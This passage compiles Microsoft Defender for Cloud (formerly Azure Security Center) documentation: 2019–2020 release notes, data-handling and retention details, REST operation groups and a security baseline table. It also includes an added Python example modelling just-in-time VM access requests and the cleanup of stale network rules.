cleanup tool automatically runs to check the validity of your entire ruleset. The tool looks for 
mismatches between rules in your policy and rules in the NSG. If the cleanup tool finds a 
mismatch, it determines the cause and, when it's safe to do so, removes built-in rules that aren't 
needed anymore. The cleaner never deletes rules that you've created. 


Learn more about the JIT access feature. 


Two security recommendations for web applications deprecated 


Two security recommendations related to web applications are being deprecated: 


• The rules for web applications on IaaS NSGs should be hardened. (Related policy: The NSGs rules 
for web applications on IaaS should be hardened) 

• Access to App Services should be restricted. (Related policy: Access to App Services should be 
restricted [preview]) 


These recommendations will no longer appear in the Security Center list of recommendations. The 
related policies will no longer be included in the initiative named "Security Center Default". 


Learn more about security recommendations. 


February 2020 


Fileless attack detection for Linux (preview) 


As attackers increasingly employ stealthier methods to avoid detection, Azure Security Center is 
extending fileless attack detection for Linux, in addition to Windows. Fileless attacks exploit software 
vulnerabilities, inject malicious payloads into benign system processes, and hide in memory. These 
techniques: 


• minimize or eliminate traces of malware on disk 

• greatly reduce the chances of detection by disk-based malware scanning solutions 


To counter this threat, Azure Security Center released fileless attack detection for Windows in October 
2018, and has now extended fileless attack detection on Linux as well. 


January 2020 


Enhanced secure score (preview) 


An enhanced version of the secure score feature of Azure Security Center is now available in preview. 
In this version, multiple recommendations are grouped into Security Controls that better reflect your 
vulnerable attack surfaces (for example, restrict access to management ports). 


Familiarize yourself with the secure score changes during the preview phase and determine other 
remediations that will help you to further secure your environment. 


Learn more about enhanced secure score (preview). 


November 2019 


Updates in November include: 


• Threat Protection for Azure Key Vault in North America regions (preview) 

• Threat Protection for Azure Storage includes Malware Reputation Screening 

• Workflow automation with Logic Apps (preview) 

• Quick Fix for bulk resources generally available 

• Scan container images for vulnerabilities (preview) 

• Additional regulatory compliance standards (preview) 

• Threat Protection for Azure Kubernetes Service (preview) 

• Virtual machine vulnerability assessment (preview) 

• Advanced data security for SQL servers on Azure Virtual Machines (preview) 

• Support for custom policies (preview) 

• Extending Azure Security Center coverage with platform for community and partners 

• Advanced integrations with export of recommendations and alerts (preview) 

• Onboard on-premises servers to Security Center from Windows Admin Center (preview) 


Threat Protection for Azure Key Vault in North America Regions (preview) 


Azure Key Vault is an essential service for protecting data and improving performance of cloud 
applications by offering the ability to centrally manage keys, secrets, cryptographic keys and policies in 
the cloud. Since Azure Key Vault stores sensitive and business critical data, it requires maximum 
security for the key vaults and the data stored in them. 


Azure Security Center's support for Threat Protection for Azure Key Vault provides an additional layer 
of security intelligence that detects unusual and potentially harmful attempts to access or exploit key 
vaults. This new layer of protection allows customers to address threats against their key vaults without 
being a security expert or managing security monitoring systems. The feature is in public preview in 
North America Regions. 


Threat Protection for Azure Storage includes Malware Reputation Screening 


Threat protection for Azure Storage offers new detections powered by Microsoft Threat Intelligence for 
detecting malware uploads to Azure Storage using hash reputation analysis and suspicious access from 
an active Tor exit node (an anonymizing proxy). You can now view detected malware across storage 
accounts using Azure Security Center. 


Workflow automation with Logic Apps (preview) 


Organizations with centrally managed security and IT/operations implement internal workflow 
processes to drive required action within the organization when discrepancies are discovered in their 
environments. In many cases, these workflows are repeatable processes and automation can greatly 
streamline processes within the organization. 


Today we are introducing a new capability in Security Center that allows customers to create 
automation configurations leveraging Azure Logic Apps and to create policies that will automatically 
trigger them based on specific ASC findings such as Recommendations or Alerts. Azure Logic App can 
be configured to do any custom action supported by the vast community of Logic App connectors, or 
use one of the templates provided by Security Center such as sending an email or opening a 
ServiceNow™ ticket. 


For more information about the automatic and manual Security Center capabilities for running your 
workflows, see workflow automation. 


To learn about creating Logic Apps, see Azure Logic Apps. 


Quick Fix for bulk resources generally available 


With the many tasks that a user is given as part of Secure Score, the ability to effectively remediate 
issues across a large fleet can become challenging. 


To simplify remediation of security misconfigurations and to be able to quickly remediate 
recommendations on a bulk of resources and improve your secure score, use Quick Fix remediation. 


This operation will allow you to select the resources you want to apply the remediation to and launch a 
remediation action that will configure the setting on your behalf. 


Quick fix is generally available today to customers as part of the Security Center recommendations page. 


See which recommendations have quick fix enabled in the reference guide to security 
recommendations. 


Scan container images for vulnerabilities (preview) 


Azure Security Center can now scan container images in Azure Container Registry for vulnerabilities. 


The image scanning works by parsing the container image file, then checking to see whether there are 
any known vulnerabilities (powered by Qualys). 


The scan itself is automatically triggered when pushing new container images to Azure Container 
Registry. Found vulnerabilities will surface as Security Center recommendations and be included in the 
secure score together with information on how to patch them to reduce the attack surface they 
allowed. 


Additional regulatory compliance standards (preview) 


The Regulatory Compliance dashboard provides insights into your compliance posture based on 
Security Center assessments. The dashboard shows how your environment complies with controls and 
requirements designated by specific regulatory standards and industry benchmarks and provides 
prescriptive recommendations for how to address these requirements. 


The regulatory compliance dashboard has thus far supported four built-in standards: Azure CIS 1.1.0, 
PCI-DSS, ISO 27001, and SOC-TSP. We are now announcing the public preview release of additional 
supported standards: NIST SP 800-53 R4, SWIFT CSP CSCF v2020, Canada Federal PBMM and UK 
Official together with UK NHS. We are also releasing an updated version of Azure CIS 1.1.0, covering 
more controls from the standard and enhancing extensibility. 


Learn more about customizing the set of standards in your regulatory compliance dashboard. 


Threat Protection for Azure Kubernetes Service (preview) 


Kubernetes is quickly becoming the new standard for deploying and managing software in the cloud. 
Few people have extensive experience with Kubernetes, and many focus only on general engineering 
and administration and overlook the security aspect. A Kubernetes environment needs to be configured 
carefully to be secure, making sure no container-focused attack surface is left open and exposed to 
attackers. Security Center is expanding its support in the container space to one of the fastest growing 
services in Azure - Azure Kubernetes Service (AKS). 


The new capabilities in this public preview release include: 


• Discovery & Visibility - Continuous discovery of managed AKS instances within Security Center's 
registered subscriptions. 

• Secure Score recommendations - Actionable items to help customers comply with security best 
practices for AKS, and increase their secure score. Recommendations include items such as "Role-
based access control should be used to restrict access to a Kubernetes Service Cluster". 

• Threat Detection - Host and cluster-based analytics, such as "A privileged container detected". 


Virtual machine vulnerability assessment (preview) 


Applications that are installed in virtual machines could often have vulnerabilities that could lead to a 
breach of the virtual machine. We are announcing that the Security Center standard tier includes built- 
in vulnerability assessment for virtual machines for no additional fee. The vulnerability assessment, 
powered by Qualys in the public preview, will allow you to continuously scan all the installed 
applications on a virtual machine to find vulnerable applications and present the findings in the 
Security Center portal's experience. Security Center takes care of all deployment operations so that no 
extra work is required from the user. Going forward we are planning to provide vulnerability 
assessment options to support our customers’ unique business needs. 


Learn more about vulnerability assessments for your Azure Virtual Machines. 


Advanced data security for SQL servers on Azure Virtual Machines (preview) 


Azure Security Center's support for threat protection and vulnerability assessment for SQL DBs running 
on IaaS VMs is now in preview. 


Vulnerability assessment is an easy to configure service that can discover, track, and help you 
remediate potential database vulnerabilities. It provides visibility into your security posture as part of 
secure score and includes the steps to resolve security issues and enhance your database fortifications. 


Advanced threat protection detects anomalous activities indicating unusual and potentially harmful 
attempts to access or exploit your SQL server. It continuously monitors your database for suspicious 
activities and provides action-oriented security alerts on anomalous database access patterns. These 
alerts provide the suspicious activity details and recommended actions to investigate and mitigate the 
threat. 


Support for custom policies (preview) 


Azure Security Center now supports custom policies (in preview). 


Our customers have been wanting to extend their current security assessments coverage in Security 
Center with their own security assessments based on policies that they create in Azure Policy. With 
support for custom policies, this is now possible. 


These new policies will be part of the Security Center recommendations experience, Secure Score, and 
the regulatory compliance standards dashboard. With the support for custom policies, you're now able 
to create a custom initiative in Azure Policy, then add it as a policy in Security Center and visualize it as 
a recommendation. 


Extending Azure Security Center coverage with platform for community and partners 


Use Security Center to receive recommendations not only from Microsoft but also from existing 
solutions from partners such as Check Point, Tenable, and CyberArk with many more integrations 
coming. Security Center's simple onboarding flow can connect your existing solutions to Security 
Center, enabling you to view your security posture recommendations in a single place, run unified 
reports and leverage all of Security Center's capabilities against both built-in and partner 
recommendations. You can also export Security Center recommendations to partner products. 


Learn more about Microsoft Intelligent Security Association. 


Advanced integrations with export of recommendations and alerts (preview) 


In order to enable enterprise level scenarios on top of Security Center, it's now possible to consume 
Security Center alerts and recommendations in places other than the Azure portal or API. These 
can be directly exported to an event hub and to Log Analytics workspaces. Here are a few workflows 
you can create around these new capabilities: 


• With export to Log Analytics workspace, you can create custom dashboards with Power BI. 

• With export to Event Hubs, you'll be able to export Security Center alerts and recommendations 
to your third-party SIEMs, to a third-party solution, or Azure Data Explorer. 


Onboard on-premises servers to Security Center from Windows Admin Center (preview) 


Windows Admin Center is a management portal for Windows servers that are not deployed in Azure, 
offering them several Azure management capabilities such as backup and system updates. We have 
recently added the ability to onboard these non-Azure servers to be protected by ASC directly from the 
Windows Admin Center experience. 


With this new experience, users will be able to onboard a WAC server to Azure Security Center and view 
its security alerts and recommendations directly in the Windows Admin Center experience. 


September 2019 


Updates in September include: 


• Managing rules with adaptive application controls improvements 
• Control container security recommendation using Azure Policy 


Managing rules with adaptive application controls improvements 


The experience of managing rules for virtual machines using adaptive application controls has 
improved. Azure Security Center's adaptive application controls help you control which applications 
can run on your virtual machines. In addition to a general improvement to rule management, a new 
benefit enables you to control which file types will be protected when you add a new rule. 


Learn more about adaptive application controls. 


Control container security recommendation using Azure Policy 


Azure Security Center's recommendation to remediate vulnerabilities in container security can now be 
enabled or disabled via Azure Policy. 


To view your enabled security policies, from Security Center open the Security Policy page. 


August 2019 


Updates in August include: 


• Just-in-time (JIT) VM access for Azure Firewall 
• Single click remediation to boost your security posture (preview) 
• Cross-tenant management 


Just-in-time (JIT) VM access for Azure Firewall 


Just-in-time (JIT) VM access for Azure Firewall is now generally available. Use it to secure your Azure 
Firewall protected environments in addition to your NSG protected environments. 


JIT VM access reduces exposure to network volumetric attacks by providing controlled access to VMs 
only when needed, using your NSG and Azure Firewall rules. 


When you enable JIT for your VMs, you create a policy that determines the ports to be protected, how 
long the ports are to remain open, and approved IP addresses from where these ports can be 
accessed. This policy helps you stay in control of what users can do when they request access. 


Requests are logged in the Azure Activity Log, so you can easily monitor and audit access. The just-in-
time page also helps you quickly identify existing VMs that have JIT enabled and VMs where JIT is 
recommended. 


Learn more about Azure Firewall. 
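The JIT policy described above (protected ports, maximum window, approved source ranges, logged requests) and the rule cleanup from the March 2020 "Improved just-in-time experience" note (JIT-created NSG rules that no longer match the policy or have expired are removed, user-created rules never are) can both be shown in one small model. This is an added example and not Security Center's implementation: the `PortPolicy`/`NsgRule`/`AccessRequest` classes, the `created_by` tag used to tell JIT-created rules from user rules, the `jit-allow-...` rule names and the sample addresses are all assumptions made here.

```python
import ipaddress
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class PortPolicy:
    """One protected port in a JIT policy (assumed model)."""
    port: int
    max_duration: timedelta          # longest window a request may ask for
    allowed_sources: list            # CIDR strings, or ["*"] for any source


@dataclass
class NsgRule:
    """A network security group rule; created_by="jit" marks rules the JIT feature added."""
    name: str
    port: int
    source: str
    created_by: str = "user"
    expires: Optional[datetime] = None


@dataclass
class AccessRequest:
    requester: str
    port: int
    source_ip: str
    duration: timedelta
    justification: str = ""          # the optional justification field, kept in the log


def validate_request(policy, req):
    """Check a request against the JIT policy; returns (approved, reason)."""
    rule = policy.get(req.port)
    if rule is None:
        return False, f"port {req.port} is not protected by the JIT policy"
    if req.duration > rule.max_duration:
        return False, f"requested window exceeds the policy maximum of {rule.max_duration}"
    ip = ipaddress.ip_address(req.source_ip)
    if "*" not in rule.allowed_sources and not any(
            ip in ipaddress.ip_network(cidr, strict=False) for cidr in rule.allowed_sources):
        return False, f"source {req.source_ip} is not an approved address range"
    return True, "approved"


def request_access(policy, req, nsg_rules, activity_log, now):
    """Log every request; on approval add a time-limited, JIT-tagged allow rule to the NSG."""
    approved, reason = validate_request(policy, req)
    activity_log.append({"time": now, "requester": req.requester, "port": req.port,
                         "source": req.source_ip, "justification": req.justification,
                         "approved": approved, "reason": reason})
    if approved:
        nsg_rules.append(NsgRule(name=f"jit-allow-{req.port}-from-{req.source_ip}",
                                 port=req.port, source=req.source_ip,
                                 created_by="jit", expires=now + req.duration))
    return approved


def cleanup(policy, nsg_rules, now):
    """Remove JIT-created rules that have expired or whose port left the policy.
    Rules created by users are never touched. Returns the names removed."""
    keep, removed = [], []
    for rule in nsg_rules:
        stale = (rule.created_by == "jit"
                 and (rule.port not in policy
                      or (rule.expires is not None and rule.expires <= now)))
        (removed if stale else keep).append(rule)
    nsg_rules[:] = keep
    return [r.name for r in removed]


def run_example(now=datetime(2020, 3, 10, 9, 0)):
    """Constructed scenario: one approved request, three rejections, then a cleanup pass."""
    policy = {
        22: PortPolicy(22, timedelta(hours=3), ["10.0.0.0/8", "203.0.113.0/24"]),
        3389: PortPolicy(3389, timedelta(hours=1), ["*"]),
    }
    nsg_rules = [
        NsgRule("AllowHTTPS", 443, "*"),                               # user rule, must survive
        NsgRule("jit-allow-5985-from-10.1.2.3", 5985, "10.1.2.3", "jit",
                now - timedelta(hours=2)),                             # port dropped from policy
        NsgRule("jit-allow-22-from-10.1.2.3", 22, "10.1.2.3", "jit",
                now - timedelta(days=1)),                              # expired window
    ]
    activity_log = []
    for req in [
        AccessRequest("alice", 22, "203.0.113.7", timedelta(hours=2), "hotfix deployment"),
        AccessRequest("bob", 22, "198.51.100.9", timedelta(hours=1)),        # unapproved source
        AccessRequest("carol", 3389, "198.51.100.9", timedelta(hours=4)),    # window too long
        AccessRequest("dave", 8080, "10.0.0.5", timedelta(minutes=30)),      # port not in policy
    ]:
        request_access(policy, req, nsg_rules, activity_log, now)
    removed = cleanup(policy, nsg_rules, now)
    return activity_log, removed, [r.name for r in nsg_rules]
```

Every request, approved or not, lands in the activity log with its justification, which is what makes the feature auditable; and because `cleanup` keys on the `created_by` tag rather than on rule names or ports, a user rule such as `AllowHTTPS` survives even when it is broader than anything the policy would grant.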


Single click remediation to boost your security posture (preview) 


Secure score is a tool that helps you assess your workload security posture. It reviews your security 
recommendations and prioritizes them for you, so you know which recommendations to perform first. 


This helps you find the most serious security vulnerabilities to prioritize investigation. 


In order to simplify remediation of security misconfigurations and help you to quickly improve your 
secure score, we've added a new capability that allows you to remediate a recommendation on a bulk 
of resources in a single click. 


This operation will allow you to select the resources you want to apply the remediation to and launch a 
remediation action that will configure the setting on your behalf. 


See which recommendations have quick fix enabled in the reference guide to security 
recommendations. 


Cross-tenant management 


Security Center now supports cross-tenant management scenarios as part of Azure Lighthouse. This 
enables you to gain visibility and manage the security posture of multiple tenants in Security Center. 


Learn more about cross-tenant management experiences. 


July 2019 


Updates to network recommendations 


Azure Security Center (ASC) has launched new networking recommendations and improved some 
existing ones. Now, using Security Center ensures even greater networking protection for your 
resources. 


Learn more about network recommendations. 


June 2019 


Adaptive network hardening - generally available 


One of the biggest attack surfaces for workloads running in the public cloud is connections to and 
from the public Internet. Our customers find it hard to know which Network Security Group (NSG) rules 
should be in place to make sure that Azure workloads are only available to required source ranges. 
With this feature, Security Center learns the network traffic and connectivity patterns of Azure 
workloads and provides NSG rule recommendations for Internet-facing virtual machines. This helps 
our customers better configure their network access policies and limit their exposure to attacks. 


Learn more about adaptive network hardening. 


Microsoft Defender for Cloud data security 


To help customers prevent, detect, and respond to threats, Microsoft Defender for Cloud collects and processes security-related data, including configuration information, metadata, event logs, and more. Microsoft adheres to strict compliance and security guidelines, from coding to operating a service. 


This article explains how data is managed and safeguarded in Defender for Cloud. 


Data sources 


Defender for Cloud analyzes data from the following sources to provide visibility into 
your security state, identify vulnerabilities and recommend mitigations, and detect active 
threats: 


- Azure services: Uses information about the configuration of Azure services you have deployed by communicating with that service's resource provider. 

- Network traffic: Uses sampled network traffic metadata from Microsoft's infrastructure, such as source/destination IP/port, packet size, and network protocol. 

- Partner solutions: Uses security alerts from integrated partner solutions, such as firewalls and antimalware solutions. 

- Your machines: Uses configuration details and information about security events, such as Windows event and audit logs, and syslog messages from your machines. 


Data sharing 


When you enable Defender for Storage Malware Scanning, it may share metadata, 
including metadata classified as customer data (e.g. SHA-256 hash), with Microsoft 
Defender for Endpoint. 


Data protection 


Data segregation 


Data is kept logically separate on each component throughout the service. All data is 
tagged per organization. This tagging persists throughout the data lifecycle, and it's 
enforced at each layer of the service. 


Data access 


To provide security recommendations and investigate potential security threats, 
Microsoft personnel may access information collected or analyzed by Azure services, 
including process creation events, and other artifacts, which may unintentionally include 
customer data or personal data from your machines. 


We adhere to the Microsoft Online Services Data Protection Addendum, which states 
that Microsoft won't use customer data or derive information from it for any advertising 
or similar commercial purposes. We only use customer data as needed to provide you 
with Azure services, including purposes compatible with providing those services. You 
retain all rights to customer data. 


Data use 


Microsoft uses patterns and threat intelligence seen across multiple tenants to enhance 
our prevention and detection capabilities; we do so in accordance with the privacy 
commitments described in our Privacy Statement. 


Manage data collection from machines 


When you enable Defender for Cloud in Azure, data collection is turned on for each of 
your Azure subscriptions. You can also enable data collection for your subscriptions in 
Defender for Cloud. When data collection is enabled, Defender for Cloud provisions the 
Log Analytics agent on all existing supported Azure virtual machines and any new ones 
that are created. 


The Log Analytics agent scans for various security-related configurations and events and collects them as Event Tracing for Windows (ETW) traces. In addition, the operating system raises event log events during the course of running the machine. Examples of such data are: operating system type and version, operating system logs (Windows event logs), running processes, machine name, IP addresses, logged-in user, and tenant ID. The Log Analytics agent reads event log entries and ETW traces and copies them to your workspace(s) for analysis. The Log Analytics agent also enables process creation events and command line auditing. 


If you aren't using Microsoft Defender for Cloud's enhanced security features, you can 
also disable data collection from virtual machines in the Security Policy. Data Collection 
is required for subscriptions that are protected by enhanced security features. VM disk 
snapshots and artifact collection will still be enabled even if data collection has been 
disabled. 


You can specify the workspace and region where data collected from your machines is 
stored. The default is to store data collected from your machines in the nearest 
workspace as shown in the following table: 


VM Geo | Workspace Geo 
United States, Brazil, South Africa | United States 
Canada | Canada 
Europe (excluding United Kingdom) | Europe 
United Kingdom | United Kingdom 
Asia (excluding India, Japan, Korea, China) | Asia Pacific 
Korea | Asia Pacific 
India | India 
Japan | Japan 
China | China 
Australia | Australia 


Note 


Microsoft Defender for Storage stores artifacts regionally according to the location of the related Azure resource. Learn more in Overview of Microsoft Defender for Storage. 


Data consumption 


Customers can access Defender for Cloud related data from the following data streams: 


Stream | Data types 
Azure Activity log | All security alerts, approved Defender for Cloud just-in-time access requests, and all alerts generated by adaptive application controls. 
Azure Monitor logs | All security alerts. 
Azure Resource Graph | Security alerts, security recommendations, vulnerability assessment results, secure score information, status of compliance checks, and more. 
Microsoft Defender for Cloud REST API | Security alerts, security recommendations, and more. 


Next steps 


In this document, you learned how data is managed and safeguarded in Microsoft 
Defender for Cloud. 


To learn more about Microsoft Defender for Cloud, see What is Microsoft Defender for 
Cloud?. 


Microsoft Defender for Cloud 


Microsoft Defender for Cloud provides unified security management and advanced threat protection across hybrid cloud workloads. With Defender for Cloud, you can apply security policies across your workloads, limit your exposure to threats, and detect and respond to attacks. 


REST Operation Groups 


Operation Group | Description 
API Collections | Discover, manage, and view security insights for API collections. 
Adaptive Application Controls | Configuration of application control rules on groups of VMs/servers. 
Adaptive Network Hardenings | Controls for Adaptive Network Hardening resources and rules. 
Advanced Threat Protection | Advanced Threat Protection settings on a specified resource. 
Alerts | Alerts on security events that happened on the subscription. 
Alerts Suppression Rules | View and edit alert suppression rules. 
Allowed Connections | Lists the permissible traffic routes between resources. 
Assessments | Manage security assessments. 
Assessments Metadata | Manage metadata for the security assessments. 
Assignments | Manage assignments of compliance initiatives. 
Auto Provisioning Settings | Auto provisioning settings of the subscriptions. 
Automations | Manage security automations. 
Compliances | Details of specific compliance initiatives. 
Connectors | Manage cloud connectors for multicloud scenarios. 
Device Security Groups | Manage the device security group for a specified IoT Hub resource. 
Discovered Security Solutions | Details of specific discovered Security Solution. 
External Security Solutions | External Security Solutions for the subscription and location. 
Information Protection Policies | Details of the information protection policies. 
IoT Alert Types | Details of an IoT alert type. 
IoT Alerts | Get the IoT alerts. 
IoT Recommendation Types | Get IoT recommendation types. 
IoT Recommendations | Get IoT recommendations. 
IoT Security Solution | Manage your IoT Security solution by name, resource group, subscription, or tag. 
IoT Security Solution Analytics | List IoT Security Analytics metrics. 
IoT Security Solutions Analytics Aggregated Alert | Manage an aggregated IoT Security Solution Alert. 
IoT Security Solutions Analytics Recommendation | Get the aggregated security analytics recommendation of your IoT Security solution. 
Jit Network Access Policies | Policies for protecting resources using Just-in-Time access control. 
Locations | Details of specific locations. 
Operations | All available operations. 
Pricings | Security pricing configuration in the resource group. 
Regulatory Compliance Assessments | Get the details and state of your regulatory compliance or the assessments mapped to them. 
Regulatory Compliance Controls | Get the details and state of your regulatory compliance controls. 
Regulatory Compliance Standards | Get the details and state of your supported regulatory compliance standards. 
Secure Score Control Definitions | List the available security controls, their assessments, and the max score. 
Secure Score Controls | Get all security controls within a scope or for a specific initiative. 
Secure Scores | Get secure score for a specific Defender for Cloud initiative or list secure scores for all your Defender for Cloud initiatives. 
Security Contacts | Security contact configurations for the subscription. 
Settings | Configuration settings for Defender for Cloud. 
Sub Assessments | Get a security sub-assessment on your scanned resources. 
Tasks | Recommended tasks that will help improve the security of the subscription proactively. 
Topology | Get a topology view of a subscription, location, or component. 
Workspace Settings | Settings about where we should store your security data and logs. 


Azure security baseline for Microsoft Defender for Cloud 


This security baseline applies guidance from the Microsoft cloud security benchmark 
version 1.0 to Microsoft Defender for Cloud. The Microsoft cloud security benchmark 
provides recommendations on how you can secure your cloud solutions on Azure. The 
content is grouped by the security controls defined by the Microsoft cloud security 
benchmark and the related guidance applicable to Microsoft Defender for Cloud. 


You can monitor this security baseline and its recommendations using Microsoft 
Defender for Cloud. Azure Policy definitions will be listed in the Regulatory Compliance 
section of the Microsoft Defender for Cloud portal page. 


When a feature has relevant Azure Policy Definitions, they are listed in this baseline to 
help you measure compliance with the Microsoft cloud security benchmark controls and 
recommendations. Some recommendations may require a paid Microsoft Defender plan 
to enable certain security scenarios. 


Note 


Features not applicable to Microsoft Defender for Cloud have been excluded. To see how Microsoft Defender for Cloud completely maps to the Microsoft cloud security benchmark, see the full Microsoft Defender for Cloud security baseline mapping file. 


Security profile 


The security profile summarizes high-impact behaviors of Microsoft Defender for Cloud, 
which may result in increased security considerations. 


Service Behavior Attribute | Value 
Product Category | Security 
Customer can access HOST / OS | No Access 
Service can be deployed into customer's virtual network | False 
Stores customer content at rest | True 


Network security 


For more information, see the Microsoft cloud security benchmark: Network security. 


NS-1: Establish network segmentation boundaries 


Features 


Virtual Network Integration 


Description: Service supports deployment into customer's private Virtual Network (VNet). Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
False | Not Applicable | Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Identity management 


For more information, see the Microsoft cloud security benchmark: Identity management. 


IM-1: Use centralized identity and authentication system 


Features 


Azure AD Authentication Required for Data Plane Access 


Description: Service supports using Azure AD authentication for data plane access. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
True | True | Microsoft 


Configuration Guidance: No additional configurations are required as this is enabled on a default deployment. 


Local Authentication Methods for Data Plane Access 


Description: Local authentication methods supported for data plane access, such as a local username and password. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
False | Not Applicable | Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


IM-3: Manage application identities securely and automatically 


Features 


Managed Identities 


Description: Data plane actions support authentication using managed identities. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
True | False | Customer 


Configuration Guidance: Use Azure managed identities instead of service principals when possible, which can authenticate to Azure services and resources that support Azure Active Directory (Azure AD) authentication. Managed identity credentials are fully managed, rotated, and protected by the platform, avoiding hard-coded credentials in source code or configuration files. 


Reference: Roles used to automatically provision agents and extensions 


Service Principals 


Description: Data plane supports authentication using service principals. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
True | False | Customer 


Configuration Guidance: There is no current Microsoft guidance for this feature configuration. Please review and determine if your organization wants to configure this security feature. 


Reference: Roles used to automatically provision agents and extensions 


IM-7: Restrict resource access based on conditions 


Features 


Conditional Access for Data Plane 


Description: Data plane access can be controlled using Azure AD Conditional Access Policies. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
True | False | Customer 


Configuration Guidance: Define the applicable conditions and criteria for Azure Active Directory (Azure AD) conditional access in the workload. Consider common use cases such as blocking or granting access from specific locations, blocking risky sign-in behavior, or requiring organization-managed devices for specific applications. 


IM-8: Restrict the exposure of credential and secrets 


Features 


Service Credential and Secrets Support Integration and Storage in Azure Key Vault 


Description: Data plane supports native use of Azure Key Vault for credential and secrets store. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
False | Not Applicable | Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Privileged access 


For more information, see the Microsoft cloud security benchmark: Privileged access. 


PA-1: Separate and limit highly privileged/administrative users 


Features 


Local Admin Accounts 


Description: Service has the concept of a local administrative account. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
False | Not Applicable | Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


PA-7: Follow just enough administration (least privilege) principle 


Features 


Azure RBAC for Data Plane 


Description: Azure Role-Based Access Control (Azure RBAC) can be used to manage access to the service's data plane actions. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
True | False | Customer 


Configuration Guidance: Defender for Cloud uses Azure role-based access control (Azure RBAC) to provide built-in roles. You can assign these roles to users, groups, and services in Azure to give users access to resources according to the access defined in the role. We recommend that you assign the least permissive role needed for users to complete their tasks. For example, assign the Reader role to users who only need to view information about the security health of a resource but not take action, such as applying recommendations or editing policies. 


Reference: Permissions in Microsoft Defender for Cloud 


PA-8: Determine access process for cloud provider support 


Features 


Customer Lockbox 


Description: Customer Lockbox can be used for Microsoft support access. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
False | Not Applicable | Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Data protection 


For more information, see the Microsoft cloud security benchmark: Data protection. 


DP-3: Encrypt sensitive data in transit 


Features 


Data in Transit Encryption 


Description: Service supports data in-transit encryption for data plane. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
True | True | Microsoft 


Configuration Guidance: No additional configurations are required as this is enabled on a default deployment. 


DP-4: Enable data at rest encryption by default 


Features 


Data at Rest Encryption Using Platform Keys 


Description: Data at-rest encryption using platform keys is supported; any customer content at rest is encrypted with these Microsoft managed keys. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
True | True | Microsoft 


Configuration Guidance: No additional configurations are required as this is enabled on a default deployment. 


DP-5: Use customer-managed key option in data at rest encryption when required 


Features 


Data at Rest Encryption Using CMK 


Description: Data at-rest encryption using customer-managed keys is supported for customer content stored by the service. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
True | False | Customer 


Configuration Guidance: Microsoft Defender for Cloud uses a configured Log Analytics workspace to store the data, alerts, and recommendations it generates. Configure a customer-managed key (CMK) for the workspace you use for Microsoft Defender for Cloud data collection. A CMK encrypts all data saved or sent to the workspace with an Azure Key Vault key that you create and own. 


Reference: Azure Monitor customer-managed key 


DP-6: Use a secure key management process 


Features 


Key Management in Azure Key Vault 


Description: The service supports Azure Key Vault integration for any customer keys, secrets, or certificates. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
True | False | Customer 


Configuration Guidance: Microsoft Defender for Cloud uses a configured Log Analytics workspace to store the data, alerts, and recommendations it generates. Configure a customer-managed key (CMK) for the workspace you use for Microsoft Defender for Cloud data collection. A CMK encrypts all data saved or sent to the workspace with an Azure Key Vault key that you create and own. 


Reference: Azure Monitor customer-managed key 


DP-7: Use a secure certificate management process 


Features 


Certificate Management in Azure Key Vault 


Description: The service supports Azure Key Vault integration for any customer certificates. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
False | Not Applicable | Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Asset management 


For more information, see the Microsoft cloud security benchmark: Asset management. 


AM-2: Use only approved services 


Features 


Azure Policy Support 


Description: Service configurations can be monitored and enforced via Azure Policy. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
True | False | Customer 


Configuration Guidance: Use Microsoft Defender for Cloud to configure Azure Policy to audit and enforce configurations of your Azure resources. Use Azure Monitor to create alerts when there is a configuration deviation detected on the resources. Use Azure Policy [deny] and [deploy if not exists] effects to enforce secure configuration across Azure resources. 


Logging and threat detection 


For more information, see the Microsoft cloud security benchmark: Logging and threat detection. 


LT-4: Enable logging for security investigation 


Features 


Azure Resource Logs 


Description: Service produces resource logs that can provide enhanced service-specific metrics and logging. The customer can configure these resource logs and send them to their own data sink like a storage account or log analytics workspace. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
False | Not Applicable | Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Backup and recovery 


For more information, see the Microsoft cloud security benchmark: Backup and recovery. 


BR-1: Ensure regular automated backups 


Features 


Azure Backup 


Description: The service can be backed up by the Azure Backup service. Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
False | Not Applicable | Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Service Native Backup Capability 


Description: Service supports its own native backup capability (if not using Azure Backup). Learn more. 


Supported | Enabled By Default | Configuration Responsibility 
False | Not Applicable | Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Next steps 


- See the Microsoft cloud security benchmark overview 
- Learn more about Azure security baselines 


Azure Policy built-in definitions for Microsoft Defender for Cloud 


This page is an index of Azure Policy built-in policy definitions related to Microsoft Defender for Cloud. The following groupings of policy definitions are available: 


- The initiatives group lists the Azure Policy initiative definitions in the "Defender for Cloud" category. 

- The default initiative group lists all the Azure Policy definitions that are part of Defender for Cloud's default initiative, Microsoft cloud security benchmark. This Microsoft-authored, widely respected benchmark builds on controls from the Center for Internet Security (CIS) and the National Institute of Standards and Technology (NIST) with a focus on cloud-centric security. 

- The category group lists all the Azure Policy definitions in the "Defender for Cloud" category. 


For more information about security policies, see Working with security policies. For other Azure Policy built-ins for other services, see Azure Policy built-in definitions. 


